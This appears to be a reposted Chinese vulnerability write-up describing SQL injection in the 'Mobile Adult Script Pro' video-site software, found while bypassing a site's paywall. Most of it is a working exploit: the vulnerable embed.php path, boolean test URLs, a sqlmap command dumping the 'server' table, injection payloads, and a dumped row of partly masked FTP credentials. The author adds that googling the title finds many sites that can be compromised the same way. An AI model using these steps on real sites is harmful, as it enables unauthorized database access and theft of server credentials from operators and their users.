网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

某国外成人网站系统通用型SQL注入漏洞 - 网站安

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 通过测试此版本均有SQL注入漏洞 但网站程序需要购买所以不清楚版本号 通过读取数据库server表可以得到ftp地址和用户密码起因是因为国内某绅士网站观看学习视频需要积分,于是找到了...

通过测试此版本均有SQL注入漏洞 但网站程序需要购买所以不清楚版本号 通过读取数据库server表可以得到ftp地址和用户密码
 
起因是因为国内某绅士网站观看学习视频需要积分,于是找到了视频播放页面就可以绕过积分限制了,后来测试了一下1=2会报错,sqlmap跑下库妥妥儿的。后来用手机登录网站发现标题和电脑登录的标题不同,显示的是Mobile Adult Script Pro 这个一看就是通用程序嘛,谷歌一下到官网发现官网提供的demo里面可以重现漏洞。
http://www.adultscriptpro.com/demo.html
 
 
google一下标题会发现不少使用此套程序的,有的需要改一下路径,基本全都可以搞定。
 
http://www.xxx.com/modules/video/player/nuevo/embed.php?id=2806 and 1=1

 
http://www.xxx.com/modules/video/player/nuevo/embed.php?id=2806 and 1=2
 
python sqlmap.py -u http://www.xxx.xxx/modules/video/player/nuevo/embed.php?id=2806 --dump -T server -D xxx -v 0
 
 
 
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
 
---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=2806 AND 6581=6581



    Type: error-based

    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

    Payload: id=2806 AND (SELECT 7265 FROM(SELECT COUNT(*),CONCAT(0x716e6a6471,(SELECT (CASE WHEN (7265=7265) THEN 1 ELSE 0 END)),0x716b767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)



    Type: AND/OR time-based blind

    Title: MySQL > 5.0.11 AND time-based blind

    Payload: id=2806 AND SLEEP(5)

---

web application technology: PHP 5.4.26

back-end DBMS: MySQL 5.0

Database: ***

Table: server

[1 entry]

+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+

| server_id | total_videos | url     | status | ftp_port | ftp_root | ftp_host       | last_used           | server_name    | rtmp_stream                    | lighttpd_url         | ftp_username | lighttpd_key | ftp_password | lighttpd_prefix | streaming_server | streaming_method | lighttpd_secdownload |

+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+

| 2         | 2974         | <blank> | 1      | 21       | /        | 16手.21动.5打.21码 | 2014-06-24 09:35:14 | 16手.21动.5打.21码 | rtmp://16手.21动.5打.21码:1935/vod | http://www.xxx.com | ***         | P4ss#w0rD    | zx*****121   | /stream/        | apache           | rtmp             | 0                    |

+-----------+--------------+---------+--------+----------+----------+----------------+---------------------+----------------+--------------------------------+----------------------+--------------+--------------+--------------+-----------------+------------------+------------------+----------------------+

 


自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论